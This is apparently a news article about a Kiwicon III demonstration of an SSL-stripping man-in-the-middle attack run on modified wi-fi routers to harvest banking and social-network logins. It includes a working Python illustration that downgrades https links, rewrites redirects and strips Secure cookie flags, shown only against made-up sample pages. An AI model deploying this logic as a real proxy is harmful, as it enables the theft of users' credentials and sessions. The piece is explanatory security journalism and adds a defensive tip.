A new and potentially dangerous wi-fi attack, one that sidesteps SSL and VeriSign certificate checks altogether rather than breaking them, will be demonstrated at the Kiwicon III hackers’ conference at Victoria University in Wellington this weekend.
For many mobile professionals, getting free wi-fi is like that morning hit of caffeine. It’s hard to beat. But now even savvy users might have to think twice.
Hacker “Numero”, also known as Tim Clephane, is set to demonstrate the attack. It uses common wi-fi router technology with modified firmware to set up a “man in the middle” and harvest user names and passwords for social networking accounts, corporate logins and even online banking sessions.
The demonstration will show how easily the router can stop the victim’s laptop from ever making a secure connection to a bank’s website. The router acts as a “man in the middle”: it makes the secure connection to the bank itself, then passes the resulting web page back to the victim over an unencrypted connection. Because the victim’s side of the exchange is never encrypted, the username and password travel in plain text and can be read straight off the network.
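The rewriting the router does can be shown in a few dozen lines. The block below is an added illustration written for this page, not Clephane’s firmware or Marlinspike’s sslstrip code; it models the two halves of such a proxy on a constructed bank response (the hostnames, cookie and HTML are made up for the example). Every https:// link the server sends back is downgraded to http:// before it reaches the victim, the Secure flag is dropped from cookies so the browser will send them in clear, and the proxy remembers which URLs were originally secure so that when the victim’s browser later asks for them over plain HTTP it can fetch them from the real site over TLS.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed sample of what a bank's web server might send to a victim who
# typed the bare hostname: a redirect to the HTTPS login page, then the login
# page itself. Made-up messages for the example, not real captures.
SAMPLE_REDIRECT = {
    "Location": "https://www.example-bank.test/login",
    "Set-Cookie": "session=abc123; Path=/; Secure; HttpOnly",
}
SAMPLE_LOGIN_PAGE = """<html><body>
<form method="post" action="https://www.example-bank.test/auth">
  <input name="user"><input name="pass" type="password">
</form>
<a href="https://seal.example-ca.test/verify?host=www.example-bank.test">
  <img src="https://seal.example-ca.test/seal.gif" alt="verified"></a>
</body></html>"""

HTTPS_URL = re.compile(r"https://[^\s\"'<>]+")


class StripState:
    """Bookkeeping shared by both halves of the proxy: which URLs were
    originally https, so the victim's plain-HTTP requests for them are
    re-upgraded to TLS on the server-facing side."""

    def __init__(self):
        self.secure = set()

    def downgrade(self, url):
        parts = urlsplit(url)
        if parts.scheme.lower() != "https":
            return url
        self.secure.add((parts.netloc.lower(), parts.path or "/"))
        return urlunsplit(("http",) + tuple(parts[1:]))

    def upstream_scheme(self, host, path):
        """Which scheme the proxy should use towards the real server."""
        return "https" if (host.lower(), path or "/") in self.secure else "http"


def strip_headers(headers, state):
    """Server-to-victim direction: rewrite Location and drop the Secure
    cookie flag so the browser will send the cookie over plain HTTP."""
    out = {}
    for name, value in headers.items():
        low = name.lower()
        if low == "location":
            value = state.downgrade(value)
        elif low == "set-cookie":
            value = re.sub(r";\s*secure(?=;|$)", "", value, flags=re.IGNORECASE)
        out[name] = value
    return out


def strip_body(html, state):
    """Rewrite every https:// link in the page so the browser never opens a
    TLS connection; each one is remembered for re-upgrading upstream."""
    return HTTPS_URL.sub(lambda m: state.downgrade(m.group(0)), html)


def demo():
    state = StripState()
    headers = strip_headers(SAMPLE_REDIRECT, state)
    body = strip_body(SAMPLE_LOGIN_PAGE, state)
    # The victim's browser will now POST the login form to http://...; the
    # proxy looks that URL up and talks TLS to the real bank on its behalf.
    return {
        "location": headers["Location"],
        "cookie": headers["Set-Cookie"],
        "body_has_https": "https://" in body,
        "form_upstream": state.upstream_scheme("www.example-bank.test", "/auth"),
        "unknown_upstream": state.upstream_scheme("www.example-bank.test", "/help"),
        "seal_stripped": "http://seal.example-ca.test/seal.gif" in body,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Note what the proxy needs in order to work: the victim’s first request has to arrive in the clear, so that the redirect to HTTPS can be rewritten before the browser ever sees it. A user who types the https:// address or opens a bookmark to it gives the proxy no plaintext exchange to tamper with.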
A quick survey of the major banks shows that Westpac, ASB, National Bank, ANZ, Bank Direct and HSBC require only a username and password to log in. This means that once your username and password have been exposed, a hacker could log in whenever they liked, provided you had not changed your password.
The exceptions are BNZ with Net-Guard and KiwiBank with KeepSafe, though Clephane says it would still be possible to steal the active session from the victim, allowing the hacker full control of the account.
What is more surprising is how normally the web pages behave, even though they are no longer on a secure connection. Clephane says the demonstration will show, disturbingly, that clicking on the VeriSign verify button will produce a pass result, even though the connection is not secure.
An astute user would notice that the browser’s padlock icon is missing and that the address does not begin with “HTTPS”, but these small cues are easy to overlook.
Clephane began his work earlier this year after discovering his own router had been hacked. He became curious as to why someone would hack a router, given the ubiquity of wi-fi, and what the hacker does once they have access to the network.
He had spare routers from a previous project. These used the Atheros chip and soft radios, making them powerful enough to be modified with new firmware that enables the attack. A tool called SSL Strip, developed by another hacker, “Moxie Marlinspike”, was modified to work on the router.
“The technique is the same, but adapted to work in the smaller device,” Clephane says.
The attack provides a “good user experience”, says Clephane, so users don’t receive any of the normal cues modern browsers would give alerting them to potentially dangerous threats.
“My attack does not trigger any certificates and browsing’s not disrupted or slowed down,” he says. He acknowledges having trapped himself on the hostile network once without realising it.
Most users access the internet with wi-fi using HTTP, Clephane says, so the router is a great vector to apply Marlinspike’s attack.
SSL Strip was demonstrated by Marlinspike at the US Black Hat conference in February.